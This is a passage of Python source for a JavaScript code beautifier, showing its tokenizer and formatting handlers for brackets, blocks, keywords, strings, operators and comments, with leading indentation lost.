if opts != None:
self.opts = opts
if self.opts.brace_style not in ['expand', 'collapse', 'end-expand']:
raise(Exception('opts.brace_style must be "expand", "collapse" or "end-expand".'))
self.blank_state()
while s and s[0] in [' ', '\t']:
self.preindent_string += s[0]
s = s[1:]
self.input = self.unpack(s, self.opts.eval_code)
self.parser_pos = 0
handlers = {
'TK_START_EXPR': self.handle_start_expr,
'TK_END_EXPR': self.handle_end_expr,
'TK_START_BLOCK': self.handle_start_block,
'TK_END_BLOCK': self.handle_end_block,
'TK_WORD': self.handle_word,
'TK_RESERVED': self.handle_word,
'TK_SEMICOLON': self.handle_semicolon,
'TK_STRING': self.handle_string,
'TK_EQUALS': self.handle_equals,
'TK_OPERATOR': self.handle_operator,
'TK_COMMA': self.handle_comma,
'TK_BLOCK_COMMENT': self.handle_block_comment,
'TK_INLINE_COMMENT': self.handle_inline_comment,
'TK_COMMENT': self.handle_comment,
'TK_DOT': self.handle_dot,
'TK_UNKNOWN': self.handle_unknown,
}
while True:
self.token_text, self.token_type = self.get_next_token()
#print (token_text, self.token_type, self.flags.mode)
if self.token_type == 'TK_EOF':
while self.flags.mode == MODE.Statement:
self.restore_mode();
break
keep_whitespace = self.opts.keep_array_indentation and self.is_array(self.flags.mode)
self.input_wanted_newline = self.n_newlines > 0
if keep_whitespace:
for i in range(self.n_newlines):
self.append_newline(i > 0)
else: # not keep_whitespace
if self.opts.max_preserve_newlines != 0 and self.n_newlines > self.opts.max_preserve_newlines:
self.n_newlines = self.opts.max_preserve_newlines
if self.opts.preserve_newlines and self.n_newlines > 1:
for i in range(self.n_newlines):
self.append_newline(i != 0)
handlers[self.token_type](self.token_text)
# The cleanest handling of inline comments is to treat them as though they aren't there.
# Just continue formatting and the behavior should be logical.
if self.token_type != 'TK_INLINE_COMMENT' and self.token_type != 'TK_COMMENT' and self.token_type != 'TK_BLOCK_COMMENT' and self.token_type != 'TK_UNKNOWN':
self.last_last_text = self.flags.last_text
self.last_type = self.token_type
self.flags.last_text = self.token_text
self.flags.had_comment = self.token_type in ['TK_COMMENT', 'TK_INLINE_COMMENT', 'TK_BLOCK_COMMENT']
sweet_code = ''.join(self.output_lines[0].text)
if len(self.output_lines) > 1:
for line_index in range(1, len(self.output_lines)):
sweet_code += '\n' + ''.join(self.output_lines[line_index].text);
sweet_code = re.sub('[\n ]+$', '', sweet_code)
return sweet_code
def unpack(self, source, evalcode=False):
import jsbeautifier.unpackers as unpackers
try:
return unpackers.run(source, evalcode)
except unpackers.UnpackingError as error:
print('error:', error)
return ''
def trim_output(self, eat_newlines = False):
self.trim_output_line(self.output_lines[-1])
while eat_newlines and len(self.output_lines) > 1 and \
len(self.output_lines[-1].text) == 0:
self.output_lines.pop()
self.trim_output_line(self.output_lines[-1])
def trim_output_line(self, line):
while len(line.text) \
and (
line.text[-1] == ' '\
or line.text[-1] == self.indent_string \
or line.text[-1] == self.preindent_string):
line.text.pop()
def is_special_word(self, s):
return s in ['case', 'return', 'do', 'if', 'throw', 'else']
def is_array(self, mode):
return mode == MODE.ArrayLiteral
def is_expression(self, mode):
return mode in [MODE.Expression, MODE.ForInitializer, MODE.Conditional]
def just_added_newline(self):
line = self.output_lines[-1]
return len(line.text) == 0
def just_added_blankline(self):
if self.just_added_newline():
if len(self.output_lines) == 1:
return True
line = self.output_lines[-2]
return len(line.text) == 0
return False
def allow_wrap_or_preserved_newline(self, token_text, force_linewrap = False):
if self.opts.wrap_line_length > 0 and not force_linewrap:
line = self.output_lines[-1]
# never wrap the first token of a line.
if len(line.text) > 0:
proposed_line_length = len(''.join(line.text)) + len(token_text)
if self.output_space_before_token:
proposed_line_length += 1
if proposed_line_length >= self.opts.wrap_line_length:
force_linewrap = True
if ((self.opts.preserve_newlines and self.input_wanted_newline) or force_linewrap) and not self.just_added_newline():
self.append_newline(preserve_statement_flags = True)
def append_newline(self, force_newline = False, preserve_statement_flags = False):
self.output_space_before_token = False
if not preserve_statement_flags:
if self.flags.last_text != ';' and self.flags.last_text != ',' and self.flags.last_text != '=' and self.last_type != 'TK_OPERATOR':
while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
self.restore_mode();
if len(self.output_lines) == 1 and self.just_added_newline():
# no newline on start of file
return
if force_newline or not self.just_added_newline():
self.flags.multiline_frame = True
self.output_lines.append(OutputLine())
def append_token_line_indentation(self):
if self.just_added_newline():
line = self.output_lines[-1]
if self.opts.keep_array_indentation and self.is_array(self.flags.mode) and self.input_wanted_newline:
# prevent removing of this whitespace as redundant
line.text.append('');
for item in self.whitespace_before_token:
line.text.append(item)
else:
if self.preindent_string != '':
line.text.append(self.preindent_string)
level = self.flags.indentation_level;
self.append_indent_string(level)
def append_indent_string(self, level):
# Never indent your first output indent at the start of the file
if len(self.output_lines) > 1:
line = self.output_lines[-1]
self.flags.line_indent_level = level
for i in range(level):
line.text.append(self.indent_string)
def append_token_space_before(self):
# make sure only single space gets drawn
line = self.output_lines[-1]
if self.output_space_before_token and len(line.text) and line.text[-1] not in [' ', self.indent_string]:
line.text.append(' ')
def append_token(self, s):
self.append_token_line_indentation()
self.append_token_space_before()
self.output_space_before_token = False
self.output_lines[-1].text.append(s)
def indent(self):
self.flags.indentation_level += 1
def deindent(self):
allow_deindent = self.flags.indentation_level > 0 and ((self.flags.parent == None) or self.flags.indentation_level > self.flags.parent.indentation_level)
if allow_deindent:
self.flags.indentation_level -= 1
def remove_redundant_indentation(self, frame):
# This implementation is effective but has some issues:
# - less than great performance due to array splicing
# - can cause line wrap to happen too soon due to indent removal
# after wrap points are calculated
# These issues are minor compared to ugly indentation.
if frame.multiline_frame:
return
# remove one indent from each line inside this section
index = frame.start_line_index
splice_index = 0
while index < len(self.output_lines):
line = self.output_lines[index]
index += 1
# skip empty lines
if len(line.text) == 0:
continue
# skip the preindent string if present
if self.preindent_string != '' and \
line.text[0] == self.preindent_string:
splice_index = 1
else:
splice_index = 0
# remove one indent, if present
if line.text[splice_index] == self.indent_string:
del line.text[splice_index]
def set_mode(self, mode):
if self.flags:
self.flag_store.append(self.flags)
self.previous_flags = self.flags
else:
self.previous_flags = BeautifierFlags(mode)
self.flags = BeautifierFlags(mode)
self.flags.apply_base(self.previous_flags, self.just_added_newline());
self.flags.start_line_index = len(self.output_lines)
def restore_mode(self):
if len(self.flag_store) > 0:
self.previous_flags = self.flags
self.flags = self.flag_store.pop()
if self.previous_flags.mode == MODE.Statement:
self.remove_redundant_indentation(self.previous_flags)
def start_of_object_property(self):
return self.flags.parent.mode == MODE.ObjectLiteral and self.flags.mode == MODE.Statement and self.flags.last_text == ':' and \
self.flags.ternary_depth == 0
def start_of_statement(self):
if (
(self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and self.token_type == 'TK_WORD') \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'do') \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'return' and not self.input_wanted_newline) \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text == 'else' and not (self.token_type == 'TK_RESERVED' and self.token_text == 'if' )) \
or (self.last_type == 'TK_END_EXPR' and (self.previous_flags.mode == MODE.ForInitializer or self.previous_flags.mode == MODE.Conditional)) \
or (self.last_type == 'TK_WORD' and self.flags.mode == MODE.BlockStatement \
and not self.flags.in_case
and not (self.token_text == '--' or self.token_text == '++')
and self.token_type != 'TK_WORD' and self.token_type != 'TK_RESERVED') \
or (self.flags.mode == MODE.ObjectLiteral and self.flags.last_text == ':' and self.flags.ternary_depth == 0) \
):
self.set_mode(MODE.Statement);
self.indent();
if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and self.token_type == 'TK_WORD':
self.flags.declaration_statement = True
# Issue #276:
# If starting a new statement with [if, for, while, do], push to a new line.
# if (a) if (b) if(c) d(); else e(); else f();
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(self.token_text, self.token_type == 'TK_RESERVED' and self.token_text in ['do', 'for', 'if', 'while']);
return True
else:
return False
def is_next(self, find):
local_pos = self.parser_pos
if local_pos >= len(self.input):
return False
c = self.input[local_pos]
while (c in self.whitespace) and c != find:
local_pos+= 1
if local_pos >= len(self.input):
return False
c = self.input[local_pos]
return c == find
def get_next_token(self):
self.n_newlines = 0
if self.parser_pos >= len(self.input):
return '', 'TK_EOF'
self.input_wanted_newline = False
self.whitespace_before_token = []
c = self.input[self.parser_pos]
self.parser_pos += 1
while c in self.whitespace:
if c == '\n':
self.n_newlines += 1
self.whitespace_before_token = []
elif c == self.indent_string:
self.whitespace_before_token.append(self.indent_string)
elif c != '\r':
self.whitespace_before_token.append(' ')
if self.parser_pos >= len(self.input):
return '', 'TK_EOF'
c = self.input[self.parser_pos]
self.parser_pos += 1
# NOTE: because beautifier doesn't fully parse, it doesn't use acorn.isIdentifierStart.
# It just treats all identifiers and numbers and such the same.
if self.acorn.isIdentifierChar(ord(self.input[self.parser_pos-1])):
if self.parser_pos < len(self.input):
while self.acorn.isIdentifierChar(ord(self.input[self.parser_pos])):
c = c + self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos == len(self.input):
break
# small and surprisingly unugly hack for IE-10 representation
if self.parser_pos != len(self.input) and self.input[self.parser_pos] in '+-' \
and re.match('^[0-9]+[Ee]$', c):
sign = self.input[self.parser_pos]
self.parser_pos += 1
t = self.get_next_token()
c += sign + t[0]
return c, 'TK_WORD'
if not (self.last_type == 'TK_DOT' \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['set', 'get'])) \
and c in self.reserved_words:
if c == 'in': # in is an operator, need to hack
return c, 'TK_OPERATOR'
return c, 'TK_RESERVED'
return c, 'TK_WORD'
if c in '([':
return c, 'TK_START_EXPR'
if c in ')]':
return c, 'TK_END_EXPR'
if c == '{':
return c, 'TK_START_BLOCK'
if c == '}':
return c, 'TK_END_BLOCK'
if c == ';':
return c, 'TK_SEMICOLON'
if c == '/':
comment = ''
inline_comment = True
if self.input[self.parser_pos] == '*': # peek /* .. */ comment
self.parser_pos += 1
if self.parser_pos < len(self.input):
while not (self.input[self.parser_pos] == '*' and \
self.parser_pos + 1 < len(self.input) and \
self.input[self.parser_pos + 1] == '/')\
and self.parser_pos < len(self.input):
c = self.input[self.parser_pos]
comment += c
if c in '\r\n':
inline_comment = False
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
self.parser_pos += 2
if inline_comment and self.n_newlines == 0:
return '/*' + comment + '*/', 'TK_INLINE_COMMENT'
else:
return '/*' + comment + '*/', 'TK_BLOCK_COMMENT'
if self.input[self.parser_pos] == '/': # peek // comment
comment = c
while self.input[self.parser_pos] not in '\r\n':
comment += self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
return comment, 'TK_COMMENT'
if c == '`' or c == "'" or c == '"' or \
( \
(c == '/') or \
(self.opts.e4x and c == "<" and re.match('^<(!\[CDATA\[[\s\S]*?\]\]|[-a-zA-Z:0-9_.]+|\{[^{}]*\})\s*([-a-zA-Z:0-9_.]+=(\{[^{}]*\}|"[^"]*"|\'[^\']*\')\s*)*\/?\s*>', self.input[self.parser_pos - 1:])) \
) and ( \
(self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text)) or \
(self.last_type == 'TK_END_EXPR' and self.previous_flags.mode in [MODE.Conditional, MODE.ForInitializer]) or \
(self.last_type in ['TK_COMMENT', 'TK_START_EXPR', 'TK_START_BLOCK', 'TK_END_BLOCK', 'TK_OPERATOR', \
'TK_EQUALS', 'TK_EOF', 'TK_SEMICOLON', 'TK_COMMA'])):
sep = c
esc = False
esc1 = 0
esc2 = 0
resulting_string = c
in_char_class = False
if self.parser_pos < len(self.input):
if sep == '/':
# handle regexp
in_char_class = False
while esc or in_char_class or self.input[self.parser_pos] != sep:
resulting_string += self.input[self.parser_pos]
if not esc:
esc = self.input[self.parser_pos] == '\\'
if self.input[self.parser_pos] == '[':
in_char_class = True
elif self.input[self.parser_pos] == ']':
in_char_class = False
else:
esc = False
self.parser_pos += 1
if self.parser_pos >= len(self.input):
# incomplete regex when end-of-file reached
# bail out with what has received so far
return resulting_string, 'TK_STRING'
elif self.opts.e4x and sep == '<':
# handle e4x xml literals
xmlRegExp = re.compile('<(\/?)(!\[CDATA\[[\s\S]*?\]\]|[-a-zA-Z:0-9_.]+|\{[^{}]*\})\s*([-a-zA-Z:0-9_.]+=(\{[^{}]*\}|"[^"]*"|\'[^\']*\')\s*)*(\/?)\s*>')
xmlStr = self.input[self.parser_pos - 1:]
match = xmlRegExp.match(xmlStr)
if match:
rootTag = match.group(2)
depth = 0
while (match):
isEndTag = match.group(1)
tagName = match.group(2)
isSingletonTag = (match.groups()[-1] != "") or (match.group(2)[0:8] == "![CDATA[")
if tagName == rootTag and not isSingletonTag:
if isEndTag:
depth -= 1
else:
depth += 1
if depth <= 0:
break
match = xmlRegExp.search(xmlStr, match.end())
if match:
xmlLength = match.end() # + len(match.group())
else:
xmlLength = len(xmlStr)
self.parser_pos += xmlLength - 1
return xmlStr[:xmlLength], 'TK_STRING'
else:
# handle string
while esc or self.input[self.parser_pos] != sep:
resulting_string += self.input[self.parser_pos]
if esc1 and esc1 >= esc2:
try:
esc1 = int(resulting_string[-esc2:], 16)
except Exception:
esc1 = False
if esc1 and esc1 >= 0x20 and esc1 <= 0x7e:
esc1 = chr(esc1)
resulting_string = resulting_string[:-2 - esc2]
if esc1 == sep or esc1 == '\\':
resulting_string += '\\'
resulting_string += esc1
esc1 = 0
if esc1:
esc1 += 1
elif not esc:
esc = self.input[self.parser_pos] == '\\'
else:
esc = False
if self.opts.unescape_strings:
if self.input[self.parser_pos] == 'x':
esc1 += 1
esc2 = 2
elif self.input[self.parser_pos] == 'u':
esc1 += 1
esc2 = 4
self.parser_pos += 1
if self.parser_pos >= len(self.input):
# incomplete string when end-of-file reached
# bail out with what has received so far
return resulting_string, 'TK_STRING'
self.parser_pos += 1
resulting_string += sep
if sep == '/':
# regexps may have modifiers /regexp/MOD, so fetch those too
while self.parser_pos < len(self.input) and self.input[self.parser_pos] in self.wordchar:
resulting_string += self.input[self.parser_pos]
self.parser_pos += 1
return resulting_string, 'TK_STRING'
if c == '#':
# she-bang
if len(self.output_lines) == 1 and len(self.output_lines[0].text) == 0 and \
len(self.input) > self.parser_pos and self.input[self.parser_pos] == '!':
resulting_string = c
while self.parser_pos < len(self.input) and c != '\n':
c = self.input[self.parser_pos]
resulting_string += c
self.parser_pos += 1
return resulting_string.strip() + '\n', 'TK_UNKNOWN'
# Spidermonkey-specific sharp variables for circular references
# https://developer.mozilla.org/En/Sharp_variables_in_JavaScript
# http://mxr.mozilla.org/mozilla-central/source/js/src/jsscan.cpp around line 1935
sharp = '#'
if self.parser_pos < len(self.input) and self.input[self.parser_pos] in self.digits:
while True:
c = self.input[self.parser_pos]
sharp += c
self.parser_pos += 1
if self.parser_pos >= len(self.input) or c == '#' or c == '=':
break
if c == '#' or self.parser_pos >= len(self.input):
pass
elif self.input[self.parser_pos] == '[' and self.input[self.parser_pos + 1] == ']':
sharp += '[]'
self.parser_pos += 2
elif self.input[self.parser_pos] == '{' and self.input[self.parser_pos + 1] == '}':
sharp += '{}'
self.parser_pos += 2
return sharp, 'TK_WORD'
if c == '<' and self.input[self.parser_pos - 1 : self.parser_pos + 3] == '<!--':
self.parser_pos += 3
c = '<!--'
while self.parser_pos < len(self.input) and self.input[self.parser_pos] != '\n':
c += self.input[self.parser_pos]
self.parser_pos += 1
self.flags.in_html_comment = True
return c, 'TK_COMMENT'
if c == '-' and self.flags.in_html_comment and self.input[self.parser_pos - 1 : self.parser_pos + 2] == '-->':
self.flags.in_html_comment = False
self.parser_pos += 2
return '-->', 'TK_COMMENT'
if c == '.':
return c, 'TK_DOT'
if c in self.punct:
while self.parser_pos < len(self.input) and c + self.input[self.parser_pos] in self.punct:
c += self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
if c == ',':
return c, 'TK_COMMA'
if c == '=':
return c, 'TK_EQUALS'
return c, 'TK_OPERATOR'
return c, 'TK_UNKNOWN'
def handle_start_expr(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
next_mode = MODE.Expression
if token_text == '[':
if self.last_type == 'TK_WORD' or self.flags.last_text == ')':
if self.last_type == 'TK_RESERVED' and self.flags.last_text in self.line_starters:
self.output_space_before_token = True
self.set_mode(next_mode)
self.append_token(token_text)
self.indent()
if self.opts.space_in_paren:
self.output_space_before_token = True
return
next_mode = MODE.ArrayLiteral
if self.is_array(self.flags.mode):
if self.flags.last_text == '[' or (
self.flags.last_text == ',' and (self.last_last_text == ']' or self.last_last_text == '}')):
# ], [ goes to a new line
# }, [ goes to a new line
if not self.opts.keep_array_indentation:
self.append_newline()
else:
if self.last_type == 'TK_RESERVED' and self.flags.last_text == 'for':
next_mode = MODE.ForInitializer
elif self.last_type == 'TK_RESERVED' and self.flags.last_text in ['if', 'while']:
next_mode = MODE.Conditional
else:
next_mode = MODE.Expression
if self.flags.last_text == ';' or self.last_type == 'TK_START_BLOCK':
self.append_newline()
elif self.last_type in ['TK_END_EXPR', 'TK_START_EXPR', 'TK_END_BLOCK'] or self.flags.last_text == '.':
# do nothing on (( and )( and ][ and ]( and .(
# TODO: Consider whether forcing this is required. Review failing tests when removed.
self.allow_wrap_or_preserved_newline(token_text, self.input_wanted_newline);
elif not (self.last_type == 'TK_RESERVED' and token_text == '(') and self.last_type not in ['TK_WORD', 'TK_OPERATOR']:
self.output_space_before_token = True
elif (self.last_type == 'TK_RESERVED' and (self.flags.last_word == 'function' or self.flags.last_word == 'typeof')) or \
(self.flags.last_text == '*' and self.last_last_text =='function'):
# function() vs function (), typeof() vs typeof ()
if self.opts.jslint_happy:
self.output_space_before_token = True
elif self.last_type == 'TK_RESERVED' and (self.flags.last_text in self.line_starters or self.flags.last_text == 'catch'):
# TODO: option space_before_conditional
self.output_space_before_token = True
# Support of this kind of newline preservation:
# a = (b &&
# (c || d));
if self.last_type in ['TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(token_text)
self.set_mode(next_mode)
self.append_token(token_text)
if self.opts.space_in_paren:
self.output_space_before_token = True
# In all cases, if we newline while inside an expression it should be indented.
self.indent()
def handle_end_expr(self, token_text):
# statements inside expressions are not valid syntax, but...
# statements must all be closed when their container closes
while self.flags.mode == MODE.Statement:
self.restore_mode()
if self.flags.multiline_frame:
self.allow_wrap_or_preserved_newline(self.token_text, self.token_text == ']' and self.is_array(self.flags.mode) and not self.opts.keep_array_indentation)
if self.opts.space_in_paren:
if self.last_type == 'TK_START_EXPR' and not self.opts.space_in_empty_paren:
# empty parens are always "()" and "[]", not "( )" or "[ ]"
self.output_space_before_token = False
self.trim_output()
else:
self.output_space_before_token = True
if self.token_text == ']' and self.opts.keep_array_indentation:
self.append_token(token_text)
self.restore_mode()
else:
self.restore_mode()
self.append_token(token_text)
self.remove_redundant_indentation(self.previous_flags);
# do {} while () // no statement required after
if self.flags.do_while and self.previous_flags.mode == MODE.Conditional:
self.previous_flags.mode = MODE.Expression
self.flags.do_block = False
self.flags.do_while = False
def handle_start_block(self, token_text):
self.set_mode(MODE.BlockStatement)
empty_braces = self.is_next('}')
empty_anonymous_function = empty_braces and self.flags.last_word == 'function' and \
self.last_type == 'TK_END_EXPR'
if self.opts.brace_style == 'expand':
if self.last_type != 'TK_OPERATOR' and \
(empty_anonymous_function or
self.last_type == 'TK_EQUALS' or
(self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text) and self.flags.last_text != 'else')):
self.output_space_before_token = True
else:
self.append_newline(preserve_statement_flags = True)
else: # collapse
if self.last_type not in ['TK_OPERATOR', 'TK_START_EXPR']:
if self.last_type == 'TK_START_BLOCK':
self.append_newline()
else:
self.output_space_before_token = True
else:
# if TK_OPERATOR or TK_START_EXPR
if self.is_array(self.previous_flags.mode) and self.flags.last_text == ',':
if self.last_last_text == '}':
self.output_space_before_token = True
else:
self.append_newline()
self.append_token(token_text)
self.indent()
def handle_end_block(self, token_text):
# statements must all be closed when their container closes
while self.flags.mode == MODE.Statement:
self.restore_mode()
empty_braces = self.last_type == 'TK_START_BLOCK';
if self.opts.brace_style == 'expand':
if not empty_braces:
self.append_newline()
else:
# skip {}
if not empty_braces:
if self.is_array(self.flags.mode) and self.opts.keep_array_indentation:
self.opts.keep_array_indentation = False
self.append_newline()
self.opts.keep_array_indentation = True
else:
self.append_newline()
self.restore_mode()
self.append_token(token_text)
def handle_word(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
elif self.input_wanted_newline and \
not self.is_expression(self.flags.mode) and \
(self.last_type != 'TK_OPERATOR' or (self.flags.last_text == '--' or self.flags.last_text == '++')) and \
self.last_type != 'TK_EQUALS' and \
(self.opts.preserve_newlines or not (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const', 'set', 'get'])):
self.append_newline()
if self.flags.do_block and not self.flags.do_while:
if self.token_type == 'TK_RESERVED' and token_text == 'while':
# do {} ## while ()
self.output_space_before_token = True
self.append_token(token_text)
self.output_space_before_token = True
self.flags.do_while = True
return
else:
# do {} should always have while as the next word.
# if we don't see the expected while, recover
self.append_newline()
self.flags.do_block = False
# if may be followed by else, or not
# Bare/inline ifs are tricky
# Need to unwind the modes correctly: if (a) if (b) c(); else d(); else e();
if self.flags.if_block:
if (not self.flags.else_block) and (self.token_type == 'TK_RESERVED' and token_text == 'else'):
self.flags.else_block = True
else:
while self.flags.mode == MODE.Statement:
self.restore_mode()
self.flags.if_block = False;
if self.token_type == 'TK_RESERVED' and (token_text == 'case' or (token_text == 'default' and self.flags.in_case_statement)):
self.append_newline()
if self.flags.case_body or self.opts.jslint_happy:
self.flags.case_body = False
self.deindent()
self.append_token(token_text)
self.flags.in_case = True
self.flags.in_case_statement = True
return
if self.token_type == 'TK_RESERVED' and token_text == 'function':
if self.flags.last_text in ['}', ';'] or (self.just_added_newline() and not self.flags.last_text in ['{', ':', '=', ',']):
# make sure there is a nice clean space of at least one blank line
# before a new function definition, except in arrays
if not self.just_added_blankline() and not self.flags.had_comment:
self.append_newline()
self.append_newline(True)
if self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set', 'new', 'return']:
self.output_space_before_token = True
else:
self.append_newline()
elif self.last_type == 'TK_OPERATOR' or self.flags.last_text == '=':
# foo = function
self.output_space_before_token = True
elif self.is_expression(self.flags.mode):
# (function
pass
else:
self.append_newline()
if self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(token_text)
if self.token_type == 'TK_RESERVED' and token_text == 'function':
self.append_token(token_text)
self.flags.last_word = token_text
return
prefix = 'NONE'
if self.last_type == 'TK_END_BLOCK':
if not (self.token_type == 'TK_RESERVED' and token_text in ['else', 'catch', 'finally']):
prefix = 'NEWLINE'
else:
if self.opts.brace_style in ['expand', 'end-expand']:
prefix = 'NEWLINE'
else:
prefix = 'SPACE'
self.output_space_before_token = True
elif self.last_type == 'TK_SEMICOLON' and self.flags.mode == MODE.BlockStatement:
# TODO: Should this be for STATEMENT as well?
prefix = 'NEWLINE'
elif self.last_type == 'TK_SEMICOLON' and self.is_expression(self.flags.mode):
prefix = 'SPACE'
elif self.last_type == 'TK_STRING':
prefix = 'NEWLINE'
elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD' or \
(self.flags.last_text == '*' and self.last_last_text == 'function'):
prefix = 'SPACE'
elif self.last_type == 'TK_START_BLOCK':
prefix = 'NEWLINE'
elif self.last_type == 'TK_END_EXPR':
self.output_space_before_token = True
prefix = 'NEWLINE'
if self.token_type == 'TK_RESERVED' and token_text in self.line_starters and self.flags.last_text != ')':
if self.flags.last_text == 'else':
prefix = 'SPACE'
else:
prefix = 'NEWLINE'
if self.token_type == 'TK_RESERVED' and token_text in ['else', 'catch', 'finally']:
if self.last_type != 'TK_END_BLOCK' \
or self.opts.brace_style == 'expand' \
or self.opts.brace_style == 'end-expand':
self.append_newline()
else:
self.trim_output(True)
line = self.output_lines[-1]
# If we trimmed and there's something other than a close block before us
# put a newline back in. Handles '} // comment' scenario.
if line.text[-1] != '}':
self.append_newline()
self.output_space_before_token = True
elif prefix == 'NEWLINE':
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
# no newline between return nnn
self.output_space_before_token = True
elif self.last_type != 'TK_END_EXPR':
if (self.last_type != 'TK_START_EXPR' or not (self.token_type == 'TK_RESERVED' and token_text in ['var', 'let', 'const'])) and self.flags.last_text != ':':
# no need to force newline on VAR -
# for (var x = 0...
if self.token_type == 'TK_RESERVED' and token_text == 'if' and self.flags.last_word == 'else' and self.flags.last_text != '{':
self.output_space_before_token = True
else:
self.append_newline()
elif self.token_type == 'TK_RESERVED' and token_text in self.line_starters and self.flags.last_text != ')':
self.append_newline()
elif self.is_array(self.flags.mode) and self.flags.last_text == ',' and self.last_last_text == '}':
self.append_newline() # }, in lists get a newline
elif prefix == 'SPACE':
self.output_space_before_token = True
self.append_token(token_text)
self.flags.last_word = token_text
if self.token_type == 'TK_RESERVED' and token_text == 'do':
self.flags.do_block = True
if self.token_type == 'TK_RESERVED' and token_text == 'if':
self.flags.if_block = True
def handle_semicolon(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
# Semicolon can be the start (and end) of a statement
self.output_space_before_token = False
while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
self.restore_mode()
self.append_token(token_text)
if self.flags.mode == MODE.ObjectLiteral:
# OBJECT mode is weird and doesn't get reset too well.
self.flags.mode = MODE.BlockStatement
def handle_string(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
# One difference - strings want at least a space before
self.output_space_before_token = True
elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
self.output_space_before_token = True
elif self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(token_text)
else:
self.append_newline()
self.append_token(token_text)
def handle_equals(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
if self.flags.declaration_statement:
# just got an '=' in a var-line, different line breaking rules will apply
self.flags.declaration_assignment = True
self.output_space_before_token = True
self.append_token(token_text)
self.output_space_before_token = True
def handle_comma(self, token_text):
if self.flags.declaration_statement:
if self.is_expression(self.flags.parent.mode):
# do not break on comma, for ( var a = 1, b = 2
self.flags.declaration_assignment = False
self.append_token(token_text)
if self.flags.declaration_assignment:
self.flags.declaration_assignment = False
self.append_newline(preserve_statement_flags = True)
else:
self.output_space_before_token = True
return
self.append_token(token_text)
if self.flags.mode == MODE.ObjectLiteral \
or (self.flags.mode == MODE.Statement and self.flags.parent.mode == MODE.ObjectLiteral):
if self.flags.mode == MODE.Statement:
self.restore_mode()
self.append_newline()
else:
# EXPR or DO_BLOCK
self.output_space_before_token = True
def handle_operator(self, token_text):
# Check if this is a BlockStatement that should be treated as a ObjectLiteral
if self.token_text == ':' and self.flags.mode == MODE.BlockStatement and \
self.last_last_text == '{' and \
(self.last_type == 'TK_WORD' or self.last_type == 'TK_RESERVED'):
self.flags.mode = MODE.ObjectLiteral
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
space_before = True
space_after = True
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
# return had a special handling in TK_WORD
self.output_space_before_token = True
self.append_token(token_text)
return
# hack for actionscript's import .*;
if token_text == '*' and self.last_type == 'TK_DOT' and not self.last_last_text.isdigit():
self.append_token(token_text)
return
if token_text == ':' and self.flags.in_case:
self.flags.case_body = True
self.indent()
self.append_token(token_text)
self.append_newline()
self.flags.in_case = False
return
if token_text == '::':
# no spaces around the exotic namespacing syntax operator
self.append_token(token_text)
return
# http://www.ecma-international.org/ecma-262/5.1/#sec-7.9.1
# if there is a newline between -- or ++ and anything else we should preserve it.
if self.input_wanted_newline and (token_text == '--' or token_text == '++'):
self.append_newline()
# Allow line wrapping between operators in an expression
if self.last_type == 'TK_OPERATOR':
self.allow_wrap_or_preserved_newline(token_text)
if token_text in ['--', '++', '!', '~'] \
or (token_text in ['+', '-'] \
and (self.last_type in ['TK_START_BLOCK', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR'] \
or self.flags.last_text in self.line_starters or self.flags.last_text == ',')):
space_before = False
space_after = False
if self.flags.last_text == ';' and self.is_expression(self.flags.mode):
# for (;; ++i)
# ^^
space_before = True
if self.last_type == 'TK_RESERVED':
space_before = True
if self.flags.mode == MODE.BlockStatement and self.flags.last_text in ['{', ';']:
# { foo: --i }
# foo(): --bar
self.append_newline()
elif token_text == ':':
if self.flags.ternary_depth == 0:
if self.flags.mode == MODE.BlockStatement:
self.flags.mode = MODE.ObjectLiteral
space_before = False
else:
self.flags.ternary_depth -= 1
elif token_text == '?':
self.flags.ternary_depth += 1
elif self.token_text == '*' and self.last_type == 'TK_RESERVED' and self.flags.last_text == 'function':
space_before = False
space_after = False
if space_before:
self.output_space_before_token = True
self.append_token(token_text)
if space_after:
self.output_space_before_token = True
def handle_block_comment(self, token_text):
lines = token_text.replace('\x0d', '').split('\x0a')
javadoc = False
# block comment starts with a new line
self.append_newline(preserve_statement_flags = True)
if len(lines) > 1:
if not any(l for l in lines[1:] if ( l.strip() == '' or (l.lstrip())[0] != '*')):
javadoc = True
# first line always indented
self.append_token(lines[0])
for line in lines[1:]:
self.append_newline(preserve_statement_flags = True)
if javadoc:
# javadoc: reformat and re-indent
self.append_token(' ' + line.strip())
